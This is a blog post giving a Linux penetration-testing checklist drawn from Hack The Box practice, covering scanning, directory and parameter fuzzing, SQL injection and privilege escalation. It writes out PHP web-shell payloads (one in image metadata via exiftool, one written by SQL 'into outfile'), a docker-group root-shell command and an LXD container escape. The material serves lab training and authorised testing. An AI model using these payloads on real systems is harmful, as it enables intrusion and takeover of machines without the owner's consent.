Pentesters often miss a simple step while testing, and incomplete enumeration results can cause complications later. In that sense, a checklist saves you from having to remember each and every step of a pentest.
In recent months, I solved a lot of Hack The Box machines, which really helped me build up a penetration testing methodology. Honestly speaking, there can be multiple ways to approach a pentest, but a few steps remain constant for any server you pick. The key part is to enumerate those thoroughly so that we don't miss even the slightest piece of information that could lead to a compromise.
In this blog post, I will be summarising all the points that one must really look into while testing any Linux machine.
Initial foothold
There are manifold ways to get an initial foothold on the box, and which one applies depends on the open ports. So let's dig into the common enumeration steps for getting that initial foothold.
Run nmap scans for both TCP and UDP. Always run a full-port scan alongside.
# nmap -sC -sV 10.10.10.X -oN tcp.nmap
# nmap -sU -vvv 10.10.10.X -oN udp.nmap
# nmap -p- -sV -A -T4 -vv 10.10.10.X -oN fullport.nmap
If port 80 is open
Check for .git
Run dirbuster/gobuster scans. Here's a small script that runs your scan against multiple wordlists and saves the output to a file. (PS: there are scenarios where a particular wordlist is required to obtain the results.)
#!/bin/bash
# usage: bash script.sh http://10.10.10.10
# Runs gobuster against each wordlist in turn and appends every hit to one file.
wordlists=(
  /usr/share/seclists/Discovery/Web-Content/big.txt
  /usr/share/seclists/Discovery/Web-Content/common.txt
  /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
  /usr/share/wordlists/rockyou.txt
)
target="$1"
[ -n "$target" ] || { echo "usage: $0 http://host"; exit 1; }
touch gobuster.scans.out
for w in "${wordlists[@]}"; do
  echo ""
  echo "== $w against $target"
  gobuster -u "$target" -w "$w" -t 50 | tee -a gobuster.scans.out
done
# deduplicated list of everything found across all wordlists
sort -u gobuster.scans.out
Run gobuster scans with flags like -x php,txt (to enumerate files with those extensions) and -s 200,301,302 (to only keep certain response codes).
# gobuster -u http://example.com -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 50 -x txt
Check the page source
When every word in a wordlist gives a 200 OK or a 301, you need to use a fuzzer. wfuzz and ffuf are the best options. Fuzzers can also be used for directory or file enumeration.
# parameter enumeration
> wfuzz -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.69/sync?FUZZ=test
# the same with ffuf, after filtering out responses of the default size (here 19 bytes)
> ./ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://fluxcapacitor.htb/sync\?FUZZ=yesterday -fs 19
Got a login form? Capture the request in Burp (save it as login.req) and scan it for SQL injection:
# sqlmap -r login.req --all --batch --level 3 --risk 3
Is a CMS (Content Management System) present?
If a CMS is present on the box, always search for its directory structure on GitHub. In most cases you will find one, as most CMSs are open source.
Search for the files where the CMS stores sensitive information such as credentials or config files.
Search for the default credentials of the CMS.
Find the version of the CMS running on the box and run searchsploit against it.
# searchsploit CMS
Searching for the directory structure can be useful, as sometimes the wordlists are unable to brute-force the directories/files.
Shell upload
Want to upload a shell where the allowed file types are restricted?
With exiftool, one can embed the shell code inside an image's metadata. This doesn't run into the extension restriction at all, since the file is still a valid image.
# exiftool -Comment='<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>' master.jpg
If SQL injection is present, try uploading the shell through it.
First, enumerate the number of columns using the ORDER BY clause. After determining the number of columns, combine it with UNION to perform a union-based SQL injection. For a practical implementation, see here.
' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/html/cmd.php' #
Approaches to privilege escalation
Once inside the box, you get the privilege of using enumeration scripts that do a lot of the work for you. The best options available are LinEnum.sh and linpeas.sh.
So let's dig into what to exploit once inside the box! Here's another checklist that can help you find your way through.
Check the contents of /var/www/html for sensitive content such as config files and database files.
Check for tomcat-users.xml if Tomcat is present.
Found sudo? Run sudo -l.
Check for files with the SUID bit set.
Check all the listening ports in the output of netstat. Check whether the ports found map to a default service. (PS: one can't always remember which service a 5-digit port number belongs to.)
If any named service is running, check for its exploits on the version running
A Python file runs with sudo privileges? Check the Python path: if we can write to a directory Python imports from, we can inject our own module and gain elevated privileges.
# print the Python module search path (the directories Python imports from, in order)
python -c 'import sys; print(sys.path)'
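The same check from the hardening side: walk the sys.path a sudo-run script would use and flag every directory a non-root user could write to, or could create because its parent is writable. This is an added example and not part of the original post; the function names are my own.

```python
# Added example (not from the original post): audit the directories a
# privileged Python script imports from. Any entry that is writable by a
# non-root user, or missing but creatable inside a writable parent, lets
# that user plant a module the script will import before the real one.
import os
import stat

def writable_by_non_root(path: str) -> bool:
    """True if a non-root user could write here: non-root owner, or group/world writable."""
    st = os.stat(path)
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_sys_path(paths) -> list:
    """Return [(entry, finding)] for every risky entry of a sys.path-style list."""
    findings = []
    for entry in paths:
        # '' in sys.path means the script's own directory / current directory
        p = entry or os.getcwd()
        if os.path.isdir(p):
            if writable_by_non_root(p):
                findings.append((entry, "writable by non-root user"))
        else:
            # a missing entry is still dangerous if someone can create it
            parent = os.path.dirname(p) or "."
            if os.path.isdir(parent) and writable_by_non_root(parent):
                findings.append((entry, "missing, but parent is writable"))
    return findings

if __name__ == "__main__":
    # Run this with the same interpreter and user the sudo rule invokes,
    # e.g. sudo -u root /usr/bin/python3 audit.py, to see that user's real path.
    import sys
    for entry, why in audit_sys_path(sys.path):
        print(f"{why}: {entry!r}")
```

Fix findings by tightening ownership and mode on the flagged directory, or by setting the import path explicitly (for example with the -I or -E interpreter flags) in the sudo rule.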
Docker is present?
Try to find credentials to get inside the Docker container.
Is any user part of the docker group? You can easily get a root shell. Exploit details can be found here.
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
If Linux containers (LXD/LXC) are present and any user is part of the lxd group, then that account can easily elevate its privileges to root. Find more about lxc here.
# lxc image import ./alpine-v3.12-x86_64-20200629_1550.tar.gz --alias myimage
# lxc init myimage ignite -c security.privileged=true
# lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
# lxc start ignite
# lxc exec ignite /bin/sh
# id
I will keep updating this checklist as I find different attack vectors. You can freely use this checklist while you perform a pentest, so that you don't miss out on the low-hanging fruit.
That's all for the blog post! Until then, happy hunting.